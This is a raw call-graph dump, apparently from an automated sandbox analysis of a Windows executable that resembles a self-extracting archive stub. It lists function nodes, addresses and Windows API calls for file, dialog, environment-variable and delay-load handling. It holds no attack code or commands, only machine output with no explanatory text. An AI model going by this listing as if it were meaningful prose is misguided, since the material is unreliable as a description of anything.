24394->24400 24397->24382 24398->24390 24399->24386 24400->24397 24401->24397 24403 f8cf4d 24402->24403 24405 f8cf54 24402->24405 24404 f8981a 79 API calls 24403->24404 24404->24405 24405->24247 24406->24249 24408 f819bf 24407->24408 24410 f819bb 24407->24410 24411 f818f6 24408->24411 24410->24253 24412 f81908 24411->24412 24413 f81945 24411->24413 24414 f83b2d 101 API calls 24412->24414 24419 f83fa3 24413->24419 24417 f81928 24414->24417 24417->24410 24423 f83fac 24419->24423 24420 f83b2d 101 API calls 24420->24423 24421 f81966 24421->24417 24424 f81e50 24421->24424 24423->24420 24423->24421 24436 f90e08 24423->24436 24425 f81e5a __EH_prolog 24424->24425 24444 f83bba 24425->24444 24427 f81e84 24428 f81732 78 API calls 24427->24428 24430 f81f0b 24427->24430 24429 f81e9b 24428->24429 24472 f818a9 78 API calls 24429->24472 24430->24417 24432 f81eb3 24434 f81ebf _wcslen 24432->24434 24473 f91b84 MultiByteToWideChar 24432->24473 24474 f818a9 78 API calls 24434->24474 24437 f90e0f 24436->24437 24440 f90e2a 24437->24440 24442 f86c31 RaiseException _com_raise_error 24437->24442 24439 f90e3b SetThreadExecutionState 24439->24423 24440->24439 24443 f86c31 RaiseException _com_raise_error 24440->24443 24442->24440 24443->24439 24445 f83bc4 __EH_prolog 24444->24445 24446 f83bda 24445->24446 24447 f83bf6 24445->24447 24500 f8138b 74 API calls 24446->24500 24449 f83e51 24447->24449 24452 f83c22 24447->24452 24517 f8138b 74 API calls 24449->24517 24451 f83be5 24451->24427 24452->24451 24475 f93377 24452->24475 24454 f83ca3 24455 f83d2e 24454->24455 24471 f83c9a 24454->24471 24503 f8d051 24454->24503 24485 f8ab1a 24455->24485 24456 f83c9f 24456->24454 24502 f820bd 78 API calls 24456->24502 24458 f83c8f 24501 f8138b 74 API calls 24458->24501 24459 f83c71 24459->24454 24459->24456 24459->24458 24461 f83d41 24465 f83dd7 24461->24465 24466 f83dc7 24461->24466 24509 f93020 123 API calls 24465->24509 24489 f89215 24466->24489 24469 f83dd5 24469->24471 24510 f82021 74 API calls 24469->24510 24511 f92297 24471->24511 24472->24432 24473->24434 24474->24430 24476 f9338c 24475->24476 24478 f93396 ___std_exception_copy 24475->24478 24518 f86ca7 75 API calls 24476->24518 24479 f934c6 24478->24479 24480 f9341c 24478->24480 24484 f93440 __cftof 24478->24484 24520 fa238d RaiseException 24479->24520 24519 f932aa 75 API calls 3 library calls 24480->24519 24483 f934f2 24484->24459 24486 f8ab28 24485->24486 24488 f8ab32 24485->24488 24487 f9eb38 8 API calls 24486->24487 24487->24488 24488->24461 24490 f8921f __EH_prolog 24489->24490 24521 f87c64 24490->24521 24493 f813ba 78 API calls 24494 f89231 24493->24494 24524 f8d114 24494->24524 24496 f8928a 24496->24469 24498 f8d114 118 API calls 24499 f89243 24498->24499 24499->24496 24499->24498 24533 f8d300 97 API calls __InternalCxxFrameHandler 24499->24533 24500->24451 24501->24471 24502->24454 24504 f8d072 24503->24504 24505 f8d084 24503->24505 24534 f8603a 82 API calls 24504->24534 24535 f8603a 82 API calls 24505->24535 24508 f8d07c 24508->24455 24509->24469 24510->24471 24512 f922a1 24511->24512 24513 f922ba 24512->24513 24516 f922ce 24512->24516 24536 f90eed 86 API calls 24513->24536 24515 f922c1 24515->24516 24517->24451 24518->24478 24519->24484 24520->24483 24522 f8b146 GetVersionExW 24521->24522 24523 f87c69 24522->24523 24523->24493 24530 f8d12a __InternalCxxFrameHandler 24524->24530 24525 f8d29a 24526 f8d2ce 24525->24526 24527 f8d0cb 6 API calls 24525->24527 24528 f90e08 SetThreadExecutionState RaiseException 24526->24528 24527->24526 24531 f8d291 24528->24531 24529 f98c8d 103 API calls 24529->24530 24530->24525 24530->24529 24530->24531 24532 f8ac05 91 API calls 24530->24532 24531->24499 24532->24530 24533->24499 24534->24508 24535->24508 24536->24515 24537->24263 24538->24263 24539->24260 24541 f85d2a 24540->24541 24587 f85c4b 24541->24587 24543 f85d95 24543->24277 24544 f85d5d 24544->24543 24592 f8b1dc CharUpperW CompareStringW _wcslen ___vcrt_FlsFree 24544->24592 24547 f88186 24546->24547 24548 f88232 24547->24548 24599 f8be5e 19 API calls __InternalCxxFrameHandler 24547->24599 24598 f91fac CharUpperW 24548->24598 24551 f8823b 24551->24280 24553 f87c22 24552->24553 24554 f87c5a 24553->24554 24600 f86e7a 74 API calls 24553->24600 24554->24291 24556 f87c52 24601 f8138b 74 API calls 24556->24601 24558->24344 24560 f89dc2 24559->24560 24561 f89db3 24559->24561 24563 f89e3f SetFileTime 24560->24563 24561->24560 24562 f89db9 FlushFileBuffers 24561->24562 24562->24560 24563->24348 24564->24270 24565->24281 24566->24281 24567->24291 24568->24291 24569->24287 24570->24300 24571->24295 24572->24300 24574 f898c5 GetFileType 24573->24574 24575 f88b5a 24573->24575 24574->24575 24575->24314 24576 f82021 74 API calls 24575->24576 24576->24312 24577->24314 24578->24315 24579->24340 24580->24340 24581->24340 24582->24340 24583->24340 24584->24342 24585->24351 24586->24294 24593 f85b48 24587->24593 24590 f85b48 2 API calls 24591 f85c6c 24590->24591 24591->24544 24592->24544 24595 f85b52 24593->24595 24594 f85c3a 24594->24590 24594->24591 24595->24594 24597 f8b1dc CharUpperW CompareStringW _wcslen ___vcrt_FlsFree 24595->24597 24597->24595 24598->24551 24599->24548 24600->24556 24601->24554 24603 f8cef2 24602->24603 24608 f8a99e 86 API calls 24603->24608 24605 f8cf24 24609 f8a99e 86 API calls 24605->24609 24607 f8cf2f 24608->24605 24609->24607 24610->24360 24612 f8a6a8 24611->24612 24613 f8a6c1 FindFirstFileW 24612->24613 24614 f8a727 FindNextFileW 24612->24614 24616 f8a6d0 24613->24616 24621 f8a709 24613->24621 24615 f8a732 GetLastError 24614->24615 24614->24621 24615->24621 24617 f8bb03 GetCurrentDirectoryW 24616->24617 24618 f8a6e0 24617->24618 24619 f8a6fe GetLastError 24618->24619 24620 f8a6e4 FindFirstFileW 24618->24620 24619->24621 24620->24619 24620->24621 24621->24215 24631 f9a5e4 GetDC GetDeviceCaps GetDeviceCaps ReleaseDC 24622->24631 24624 f9a5cd 24625 f9a5d9 24624->24625 24632 f9a605 GetDC GetDeviceCaps GetDeviceCaps ReleaseDC 24624->24632 24625->23866 24625->23867 24627->23873 24628->23876 24629->23876 24630->23879 24631->24624 24632->24625 24633->23887 24635 f89f42 78 API calls 24634->24635 24636 f81fe8 24635->24636 24637 f81a04 101 API calls 24636->24637 24640 f82005 24636->24640 24638 f81ff5 24637->24638 24638->24640 24641 f8138b 74 API calls 24638->24641 24640->23895 24640->23896 24641->24640 24643 f9b5bc GetDlgItem 24642->24643 24644 f9b583 GetMessageW 24642->24644 24643->23906 24643->23907 24645 f9b599 IsDialogMessageW 24644->24645 24646 f9b5a8 TranslateMessage DispatchMessageW 24644->24646 24645->24643 24645->24646 24646->24643 24647 f813e1 84 API calls 2 library calls 25400 f994e0 GetClientRect 25401 f9f2e0 46 API calls __RTC_Initialize 25450 f921e0 26 API calls std::bad_exception::bad_exception 25402 fabee0 GetCommandLineA GetCommandLineW 24649 f9eae7 24650 f9eaf1 24649->24650 24651 f9e85d ___delayLoadHelper2@8 14 API calls 24650->24651 24652 f9eafe 24651->24652 25403 f9f4e7 29 API calls _abort 25404 fa0ada 51 API calls 2 library calls 24716 f9e1d1 14 API calls ___delayLoadHelper2@8 25405 f9f4d3 20 API calls 25452 faa3d0 21 API calls 2 library calls 25453 fb2bd0 VariantClear 24720 f810d5 24725 f85abd 24720->24725 24726 f85ac7 __EH_prolog 24725->24726 24727 f8b505 84 API calls 24726->24727 24728 f85ad3 24727->24728 24732 f85cac GetCurrentProcess GetProcessAffinityMask 24728->24732 24733 f9e2d7 24734 f9e1db 24733->24734 24735 f9e85d ___delayLoadHelper2@8 14 API calls 24734->24735 24735->24734 25408 f962ca 123 API calls __InternalCxxFrameHandler 25456 f9b5c0 100 API calls 25457 f977c0 118 API calls 25458 f9ffc0 RaiseException _com_raise_error _com_error::_com_error 24742 f9dec2 24743 f9decf 24742->24743 24744 f8e617 53 API calls 24743->24744 24745 f9dedc 24744->24745 24746 f84092 _swprintf 51 API calls 24745->24746 24747 f9def1 SetDlgItemTextW 24746->24747 24748 f9b568 5 API calls 24747->24748 24749 f9df0e 24748->24749 25459 fab1b8 27 API calls 3 library calls 25460 f91bbd GetCPInfo IsDBCSLeadByte 24756 f9e5b1 24757 f9e578 24756->24757 24757->24756 24758 f9e85d ___delayLoadHelper2@8 14 API calls 24757->24758 24758->24757 25461 f9b1b0 GetDlgItem EnableWindow ShowWindow SendMessageW 24886 f9f3b2 24887 f9f3be __FrameHandler3::FrameUnwindToState 24886->24887 24918 f9eed7 24887->24918 24889 f9f3c5 24890 f9f518 24889->24890 24893 f9f3ef 24889->24893 24991 f9f838 4 API calls 2 library calls 24890->24991 24892 f9f51f 24984 fa7f58 24892->24984 24901 f9f42e ___scrt_is_nonwritable_in_current_image ___scrt_release_startup_lock 24893->24901 24929 fa8aed 24893->24929 24900 f9f40e 24903 f9f48f 24901->24903 24987 fa7af4 38 API calls 2 library calls 24901->24987 24937 f9f953 GetStartupInfoW __cftof 24903->24937 24905 f9f495 24938 fa8a3e 51 API calls 24905->24938 24908 f9f49d 24939 f9df1e 24908->24939 24912 f9f4b1 24912->24892 24913 f9f4b5 24912->24913 24914 f9f4be 24913->24914 24989 fa7efb 28 API calls _abort 24913->24989 24990 f9f048 12 API calls ___scrt_uninitialize_crt 24914->24990 24917 f9f4c6 24917->24900 24919 f9eee0 24918->24919 24993 f9f654 IsProcessorFeaturePresent 24919->24993 24921 f9eeec 24994 fa2a5e 24921->24994 24923 f9eef1 24928 f9eef5 24923->24928 25002 fa8977 24923->25002 24925 f9ef0c 24925->24889 24928->24889 24930 fa8b04 24929->24930 24931 f9fbbc __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 24930->24931 24932 f9f408 24931->24932 24932->24900 24933 fa8a91 24932->24933 24934 fa8ac0 24933->24934 24935 f9fbbc __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 24934->24935 24936 fa8ae9 24935->24936 24936->24901 24937->24905 24938->24908 25095 f90863 24939->25095 24943 f9df3d 25144 f9ac16 24943->25144 24945 f9df46 __cftof 24946 f9df59 GetCommandLineW 24945->24946 24947 f9df68 24946->24947 24948 f9dfe6 GetModuleFileNameW SetEnvironmentVariableW GetLocalTime 24946->24948 25148 f9c5c4 24947->25148 24949 f84092 _swprintf 51 API calls 24948->24949 24952 f9e04d SetEnvironmentVariableW GetModuleHandleW LoadIconW 24949->24952 25159 f9b6dd LoadBitmapW 24952->25159 24953 f9dfe0 25153 f9dbde 24953->25153 24954 f9df76 OpenFileMappingW 24957 f9df8f MapViewOfFile 24954->24957 24958 f9dfd6 CloseHandle 24954->24958 24961 f9dfcd UnmapViewOfFile 24957->24961 24962 f9dfa0 __InternalCxxFrameHandler 24957->24962 24958->24948 24961->24958 24966 f9dbde 2 API calls 24962->24966 24968 f9dfbc 24966->24968 24967 f990b7 8 API calls 24969 f9e0aa DialogBoxParamW 24967->24969 24968->24961 24970 f9e0e4 24969->24970 24971 f9e0fd 24970->24971 24972 f9e0f6 Sleep 24970->24972 24975 f9e10b 24971->24975 25189 f9ae2f CompareStringW SetCurrentDirectoryW __cftof _wcslen 24971->25189 24972->24971 24974 f9e12a DeleteObject 24976 f9e13f DeleteObject 24974->24976 24977 f9e146 24974->24977 24975->24974 24976->24977 24978 f9e177 24977->24978 24982 f9e189 24977->24982 25190 f9dc3b 6 API calls 24978->25190 24981 f9e17d CloseHandle 24981->24982 25186 f9ac7c 24982->25186 24983 f9e1c3 24988 f9f993 GetModuleHandleW 24983->24988 25322 fa7cd5 24984->25322 24987->24903 24988->24912 24989->24914 24990->24917 24991->24892 24993->24921 25006 fa3b07 24994->25006 24997 fa2a67 24997->24923 24999 fa2a6f 25000 fa2a7a 24999->25000 25020 fa3b43 DeleteCriticalSection 24999->25020 25000->24923 25049 fac05a 25002->25049 25005 fa2a7d 7 API calls 2 library calls 25005->24928 25007 fa3b10 25006->25007 25009 fa3b39 25007->25009 25010 fa2a63 25007->25010 25021 fa3d46 25007->25021 25026 fa3b43 DeleteCriticalSection 25009->25026 25010->24997 25012 fa2b8c 25010->25012 25042 fa3c57 25012->25042 25015 fa2ba1 25015->24999 25017 fa2baf 25018 fa2bbc 25017->25018 25048 fa2bbf 6 API calls ___vcrt_FlsFree 25017->25048 25018->24999 25020->24997 25027 fa3c0d 25021->25027 25024 fa3d7e InitializeCriticalSectionAndSpinCount 25025 fa3d69 25024->25025 25025->25007 25026->25010 25028 fa3c4f 25027->25028 25029 fa3c26 25027->25029 25028->25024 25028->25025 25029->25028 25034 fa3b72 25029->25034 25032 fa3c3b GetProcAddress 25032->25028 25033 fa3c49 25032->25033 25033->25028 25036 fa3b7e ___vcrt_FlsFree 25034->25036 25035 fa3bf3 25035->25028 25035->25032 25036->25035 25037 fa3b95 LoadLibraryExW 25036->25037 25041 fa3bd5 LoadLibraryExW 25036->25041 25038 fa3bfa 25037->25038 25039 fa3bb3 GetLastError 25037->25039 25038->25035 25040 fa3c02 FreeLibrary 25038->25040 25039->25036 25040->25035 25041->25036 25041->25038 25043 fa3c0d ___vcrt_FlsFree 5 API calls 25042->25043 25044 fa3c71 25043->25044 25045 fa3c8a TlsAlloc 25044->25045 25046 fa2b96 25044->25046 25046->25015 25047 fa3d08 6 API calls ___vcrt_FlsFree 25046->25047 25047->25017 25048->25015 25052 fac077 25049->25052 25053 fac073 25049->25053 25050 f9fbbc __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 25051 f9eefe 25050->25051 25051->24925 25051->25005 25052->25053 25055 faa6a0 25052->25055 25053->25050 25056 faa6ac __FrameHandler3::FrameUnwindToState 25055->25056 25067 faac31 EnterCriticalSection 25056->25067 25058 faa6b3 25068 fac528 25058->25068 25060 faa6c2 25065 faa6d1 25060->25065 25081 faa529 29 API calls 25060->25081 25063 faa6cc 25082 faa5df GetStdHandle GetFileType 25063->25082 25083 faa6ed LeaveCriticalSection _abort 25065->25083 25066 faa6e2 _abort 25066->25052 25067->25058 25069 fac534 __FrameHandler3::FrameUnwindToState 25068->25069 25070 fac558 25069->25070 25071 fac541 25069->25071 25084 faac31 EnterCriticalSection 25070->25084 25092 fa91a8 20 API calls _abort 25071->25092 25074 fac564 25080 fac590 25074->25080 25085 fac479 25074->25085 25075 fac546 25093 fa9087 26 API calls ___std_exception_copy 25075->25093 25077 fac550 _abort 25077->25060 25094 fac5b7 LeaveCriticalSection _abort 25080->25094 25081->25063 25082->25065 25083->25066 25084->25074 25086 fab136 _unexpected 20 API calls 25085->25086 25087 fac48b 25086->25087 25090 faaf0a 11 API calls 25087->25090 25091 fac498 25087->25091 25088 fa8dcc _free 20 API calls 25089 fac4ea 25088->25089 25089->25074 25090->25087 25091->25088 25092->25075 25093->25077 25094->25077 25096 f9ec50 25095->25096 25097 f9086d GetModuleHandleW 25096->25097 25098 f90888 GetProcAddress 25097->25098 25099 f908e7 25097->25099 25101 f908b9 GetProcAddress 25098->25101 25102 f908a1 25098->25102 25100 f90c14 GetModuleFileNameW 25099->25100 25200 fa75fb 42 API calls __vsnwprintf_l 25099->25200 25111 f90c32 25100->25111 25103 f908cb 25101->25103 25102->25101 25103->25099 25105 f90b54 25105->25100 25106 f90b5f GetModuleFileNameW CreateFileW 25105->25106 25107 f90c08 CloseHandle 25106->25107 25108 f90b8f SetFilePointer 25106->25108 25107->25100 25108->25107 25109 f90b9d ReadFile 25108->25109 25109->25107 25113 f90bbb 25109->25113 25114 f90c94 GetFileAttributesW 25111->25114 25116 f90c5d CompareStringW 25111->25116 25117 f90cac 25111->25117 25191 f8b146 25111->25191 25194 f9081b 25111->25194 25113->25107 25115 f9081b 2 API calls 25113->25115 25114->25111 25114->25117 25115->25113 25116->25111 25118 f90cb7 25117->25118 25120 f90cec 25117->25120 25121 f90cd0 GetFileAttributesW 25118->25121 25123 f90ce8 25118->25123 25119 f90dfb 25143 f9a64d GetCurrentDirectoryW 25119->25143 25120->25119 25122 f8b146 GetVersionExW 25120->25122 25121->25118 25121->25123 25124 f90d06 25122->25124 25123->25120 25125 f90d0d 25124->25125 25126 f90d73 25124->25126 25128 f9081b 2 API calls 25125->25128 25127 f84092 _swprintf 51 API calls 25126->25127 25129 f90d9b AllocConsole 25127->25129 25130 f90d17 25128->25130 25131 f90da8 GetCurrentProcessId AttachConsole 25129->25131 25132 f90df3 ExitProcess 25129->25132 25133 f9081b 2 API calls 25130->25133 25201 fa3e13 25131->25201 25135 f90d21 25133->25135 25137 f8e617 53 API calls 25135->25137 25136 f90dc9 GetStdHandle WriteConsoleW Sleep FreeConsole 25136->25132 25138 f90d3c 25137->25138 25139 f84092 _swprintf 51 API calls 25138->25139 25140 f90d4f 25139->25140 25141 f8e617 53 API calls 25140->25141 25142 f90d5e 25141->25142 25142->25132 25143->24943 25145 f9081b 2 API calls 25144->25145 25146 f9ac2a OleInitialize 25145->25146 25147 f9ac4d GdiplusStartup SHGetMalloc 25146->25147 25147->24945 25150 f9c5ce 25148->25150 25149 f9c6e4 25149->24953 25149->24954 25150->25149 25152 f91fac CharUpperW 25150->25152 25203 f8f3fa 82 API calls 2 library calls 25150->25203 25152->25150 25154 f9ec50 25153->25154 25155 f9dbeb SetEnvironmentVariableW 25154->25155 25157 f9dc0e 25155->25157 25156 f9dc36 25156->24948 25157->25156 25158 f9dc2a SetEnvironmentVariableW 25157->25158 25158->25156 25160 f9b70b GetObjectW 25159->25160 25161 f9b6fe 25159->25161 25165 f9b71a 25160->25165 25204 f9a6c2 FindResourceW 25161->25204 25164 f9a5c6 4 API calls 25166 f9b72d 25164->25166 25165->25164 25167 f9b770 25166->25167 25168 f9b74c 25166->25168 25169 f9a6c2 13 API calls 25166->25169 25178 f8da42 25167->25178 25220 f9a605 GetDC GetDeviceCaps GetDeviceCaps ReleaseDC 25168->25220 25171 f9b73d 25169->25171 25171->25168 25173 f9b743 DeleteObject 25171->25173 25172 f9b754 25221 f9a5e4 GetDC GetDeviceCaps GetDeviceCaps ReleaseDC 25172->25221 25173->25168 25175 f9b75d 25222 f9a80c 8 API calls 25175->25222 25177 f9b764 DeleteObject 25177->25167 25231 f8da67 25178->25231 25183 f990b7 25184 f9eb38 8 API calls 25183->25184 25185 f990d6 25184->25185 25185->24967 25187 f9acab GdiplusShutdown CoUninitialize 25186->25187 25187->24983 25189->24975 25190->24981 25192 f8b15a GetVersionExW 25191->25192 25193 f8b196 25191->25193 25192->25193 25193->25111 25195 f9ec50 25194->25195 25196 f90828 GetSystemDirectoryW 25195->25196 25197 f9085e 25196->25197 25198 f90840 25196->25198 25197->25111 25199 f90851 LoadLibraryW 25198->25199 25199->25197 25200->25105 25202 fa3e1b 25201->25202 25202->25136 25202->25202 25203->25150 25205 f9a7d3 25204->25205 25206 f9a6e5 SizeofResource 25204->25206 25205->25160 25205->25165 25206->25205 25207 f9a6fc LoadResource 25206->25207 25207->25205 25208 f9a711 LockResource 25207->25208 25208->25205 25209 f9a722 GlobalAlloc 25208->25209 25209->25205 25210 f9a73d GlobalLock 25209->25210 25211 f9a7cc GlobalFree 25210->25211 25212 f9a74c __InternalCxxFrameHandler 25210->25212 25211->25205 25213 f9a754 CreateStreamOnHGlobal 25212->25213 25214 f9a76c 25213->25214 25215 f9a7c5 GlobalUnlock 25213->25215 25223 f9a626 GdipAlloc 25214->25223 25215->25211 25218 f9a79a GdipCreateHBITMAPFromBitmap 25219 f9a7b0 25218->25219 25219->25215 25220->25172 25221->25175 25222->25177 25224 f9a638 25223->25224 25225 f9a645 25223->25225 25227 f9a3b9 25224->25227 25225->25215 25225->25218 25225->25219 25228 f9a3da GdipCreateBitmapFromStreamICM 25227->25228 25229 f9a3e1 GdipCreateBitmapFromStream 25227->25229 25230 f9a3e6 25228->25230 25229->25230 25230->25225 25232 f8da75 __EH_prolog 25231->25232 25233 f8daa4 GetModuleFileNameW 25232->25233 25234 f8dad5 25232->25234 25235 f8dabe 25233->25235 25277 f898e0 25234->25277 25235->25234 25237 f8db31 25288 fa6310 25237->25288 25238 f8959a 80 API calls 25239 f8da4e 25238->25239 25275 f8e29e GetModuleHandleW FindResourceW 25239->25275 25241 f8e261 78 API calls 25243 f8db05 25241->25243 25242 f8db44 25244 fa6310 26 API calls 25242->25244 25243->25237 25243->25241 25255 f8dd4a 25243->25255 25252 f8db56 ___vcrt_FlsFree 25244->25252 25245 f8dc85 25245->25255 25308 f89d70 81 API calls 25245->25308 25247 f89e80 79 API calls 25247->25252 25249 f8dc9f ___std_exception_copy 25250 f89bd0 82 API calls 25249->25250 25249->25255 25253 f8dcc8 ___std_exception_copy 25250->25253 25252->25245 25252->25247 25252->25255 25302 f89bd0 25252->25302 25307 f89d70 81 API calls 25252->25307 25253->25255 25272 f8dcd3 _wcslen ___std_exception_copy ___vcrt_FlsFree 25253->25272 25309 f91b84 MultiByteToWideChar 25253->25309 25255->25238 25256 f8e159 25260 f8e1de 25256->25260 25315 fa8cce 26 API calls ___std_exception_copy 25256->25315 25258 f8e16e 25316 fa7625 26 API calls ___std_exception_copy 25258->25316 25261 f8e214 25260->25261 25265 f8e261 78 API calls 25260->25265 25266 fa6310 26 API calls 25261->25266 25263 f8e1c6 25317 f8e27c 78 API calls 25263->25317 25265->25260 25267 f8e22d 25266->25267 25268 fa6310 26 API calls 25267->25268 25268->25255 25270 f91da7 WideCharToMultiByte 25270->25272 25272->25255 25272->25256 25272->25270 25310 f8e5b1 50 API calls __vsnprintf 25272->25310 25311 fa6159 26 API calls 3 library calls 25272->25311 25312 fa8cce 26 API calls ___std_exception_copy 25272->25312 25313 fa7625 26 API calls ___std_exception_copy 25272->25313 25314 f8e27c 78 API calls 25272->25314 25276 f8da55 25275->25276 25276->25183 25278 f898ea 25277->25278 25279 f8994b CreateFileW 25278->25279 25280 f8996c GetLastError 25279->25280 25283 f899bb 25279->25283 25281 f8bb03 GetCurrentDirectoryW 25280->25281 25282 f8998c 25281->25282 25282->25283 25284 f89990 CreateFileW GetLastError 25282->25284 25285 f899e5 SetFileTime 25283->25285 25287 f899ff 25283->25287 25284->25283 25286 f899b5 25284->25286 25285->25287 25286->25283 25287->25243 25289 fa6349 25288->25289 25290 fa634d 25289->25290 25301 fa6375 25289->25301 25318 fa91a8 20 API calls _abort 25290->25318 25292 fa6352 25319 fa9087 26 API calls ___std_exception_copy 25292->25319 25293 fa6699 25295 f9fbbc __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 25293->25295 25297 fa66a6 25295->25297 25296 fa635d 25298 f9fbbc __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 25296->25298 25297->25242 25299 fa6369 25298->25299 25299->25242 25301->25293 25320 fa6230 5 API calls __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 25301->25320 25303 f89bdc 25302->25303 25305 f89be3 25302->25305 25303->25252 25305->25303 25306 f89785 GetStdHandle ReadFile GetLastError GetLastError GetFileType 25305->25306 25321 f86d1a 77 API calls 25305->25321 25306->25305 25307->25252 25308->25249 25309->25272 25310->25272 25311->25272 25312->25272 25313->25272 25314->25272 25315->25258 25316->25263 25317->25260 25318->25292 25319->25296 25320->25301 25321->25305 25323 fa7ce1 _unexpected 25322->25323 25324 fa7cfa 25323->25324 25325 fa7ce8 25323->25325 25346 faac31 EnterCriticalSection 25324->25346 25358 fa7e2f GetModuleHandleW 25325->25358 25328 fa7ced 25328->25324 25359 fa7e73 GetModuleHandleExW 25328->25359 25329 fa7d9f 25347 fa7ddf 25329->25347 25334 fa7d76 25335 fa7d8e 25334->25335 25340 fa8a91 _abort 5 API calls 25334->25340 25341 fa8a91 _abort 5 API calls 25335->25341 25336 fa7d01 25336->25329 25336->25334 25367 fa87e0 20 API calls _abort 25336->25367 25337 fa7de8 25368 fb2390 5 API calls __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 25337->25368 25338 fa7dbc 25350 fa7dee 25338->25350 25340->25335 25341->25329 25346->25336 25369 faac81 LeaveCriticalSection 25347->25369 25349 fa7db8 25349->25337 25349->25338 25370 fab076 25350->25370 25353 fa7e1c 25356 fa7e73 _abort 8 API calls 25353->25356 25354 fa7dfc GetPEB 25354->25353 25355 fa7e0c GetCurrentProcess TerminateProcess 25354->25355 25355->25353 25357 fa7e24 ExitProcess 25356->25357 25358->25328 25360 fa7e9d GetProcAddress 25359->25360 25361 fa7ec0 25359->25361 25362 fa7eb2 25360->25362 25363 fa7ecf 25361->25363 25364 fa7ec6 FreeLibrary 25361->25364 25362->25361 25365 f9fbbc __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 25363->25365 25364->25363 25366 fa7cf9 25365->25366 25366->25324 25367->25334 25369->25349 25371 fab09b 25370->25371 25372 fab091 25370->25372 25373 faac98 _unexpected 5 API calls 25371->25373 25374 f9fbbc __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 25372->25374 25373->25372 25375 fa7df8 25374->25375 25375->25353 25375->25354 25464 f86faa 111 API calls 3 library calls 25411 f9dca1 DialogBoxParamW 25465 f9f3a0 27 API calls 25414 faa4a0 71 API calls _free 25415 fb08a0 IsProcessorFeaturePresent 25466 f9eda7 48 API calls _unexpected 25417 f9c793 97 API calls 4 library calls 25468 f9b18d 78 API calls 25469 f99580 6 API calls 25419 f9c793 102 API calls 4 library calls 23463 f89f7a 23464 f89f88 23463->23464 23465 f89f8f 23463->23465 23466 f89f9c GetStdHandle 23465->23466 23473 f89fab 23465->23473 23466->23473 23467 f8a003 WriteFile 23467->23473 23468 f89fcf 23469 f89fd4 WriteFile 23468->23469 23468->23473 23469->23468 23469->23473 23471 f8a095 23475 f86e98 77 API calls 23471->23475 23473->23464 23473->23467 23473->23468 23473->23469 23473->23471 23474 f86baa 78 API calls 23473->23474 23474->23473 23475->23464 25421 f9a070 10 API calls 25423 f9b270 99 API calls 25474 f81f72 128 API calls __EH_prolog 23531 f89a74 23535 f89a7e 23531->23535 23532 f89ab1 23533 f89b9d SetFilePointer 23533->23532 23534 f89bb6 GetLastError 23533->23534 23534->23532 23535->23532 23535->23533 23537 f89b79 23535->23537 23538 f8981a 23535->23538 23537->23533 23539 f89833 23538->23539 23542 f89e80 23539->23542 23543 f89e92 23542->23543 23544 f89ea5 23542->23544 23547 f89865 23543->23547 23551 f86d5b 77 API calls 23543->23551 23546 f89eb8 SetFilePointer 23544->23546 23544->23547 23546->23547 23548 f89ed4 GetLastError 23546->23548 23547->23537 23548->23547 23549 f89ede 23548->23549 23549->23547 23552 f86d5b 77 API calls 23549->23552 23551->23544 23552->23547 25424 f81075 84 API calls 23554 f9e569 23555 f9e517 23554->23555 23555->23554 23557 f9e85d 23555->23557 23583 f9e5bb 23557->23583 23559 f9e86d 23560 f9e8ca 23559->23560 23567 f9e8ee 23559->23567 23561 f9e7fb DloadReleaseSectionWriteAccess 6 API calls 23560->23561 23562 f9e8d5 RaiseException 23561->23562 23577 f9eac3 23562->23577 23563 f9e966 LoadLibraryExA 23564 f9e979 GetLastError 23563->23564 23565 f9e9c7 23563->23565 23570 f9e9a2 23564->23570 23576 f9e98c 23564->23576 23568 f9e9d9 23565->23568 23569 f9e9d2 FreeLibrary 23565->23569 23566 f9ea95 23592 f9e7fb 23566->23592 23567->23563 23567->23565 23567->23566 23567->23568 23568->23566 23571 f9ea37 GetProcAddress 23568->23571 23569->23568 23572 f9e7fb DloadReleaseSectionWriteAccess 6 API calls 23570->23572 23571->23566 23573 f9ea47 GetLastError 23571->23573 23574 f9e9ad RaiseException 23572->23574 23579 f9ea5a 23573->23579 23574->23577 23576->23565 23576->23570 23577->23555 23578 f9e7fb DloadReleaseSectionWriteAccess 6 API calls 23580 f9ea7b RaiseException 23578->23580 23579->23566 23579->23578 23581 f9e5bb ___delayLoadHelper2@8 6 API calls 23580->23581 23582 f9ea92 23581->23582 23582->23566 23584 f9e5ed 23583->23584 23585 f9e5c7 23583->23585 23584->23559 23600 f9e664 23585->23600 23587 f9e5cc 23588 f9e5e8 23587->23588 23603 f9e78d 23587->23603 23608 f9e5ee GetModuleHandleW GetProcAddress GetProcAddress 23588->23608 23591 f9e836 23591->23559 23593 f9e80d 23592->23593 23594 f9e82f 23592->23594 23595 f9e664 DloadReleaseSectionWriteAccess 3 API calls 23593->23595 23594->23577 23596 f9e812 23595->23596 23597 f9e82a 23596->23597 23598 f9e78d DloadProtectSection 3 API calls 23596->23598 23611 f9e831 GetModuleHandleW GetProcAddress GetProcAddress DloadReleaseSectionWriteAccess 23597->23611 23598->23597 23609 f9e5ee GetModuleHandleW GetProcAddress GetProcAddress 23600->23609 23602 f9e669 23602->23587 23606 f9e7a2 DloadProtectSection 23603->23606 23604 f9e7a8 23604->23588 23605 f9e7dd VirtualProtect 23605->23604 23606->23604 23606->23605 23610 f9e6a3 VirtualQuery GetSystemInfo 23606->23610 23608->23591 23609->23602 23610->23605 23611->23594 25425 fa8268 55 API calls _free 25426 f9c793 107 API calls 4 library calls 25475 fa7f6e 52 API calls 3 library calls 24653 f9cd58 24655 f9ce22 24653->24655 24659 f9cd7b 24653->24659 24654 f9b314 ExpandEnvironmentStringsW 24669 f9c793 _wcslen _wcsrchr 24654->24669 24655->24669 24681 f9d78f 24655->24681 24657 f9d40a 24658 f91fbb CompareStringW 24658->24659 24659->24655 24659->24658 24661 f9ca67 SetWindowTextW 24661->24669 24664 fa3e3e 22 API calls 24664->24669 24666 f9c855 SetFileAttributesW 24668 f9c90f GetFileAttributesW 24666->24668 24679 f9c86f __cftof 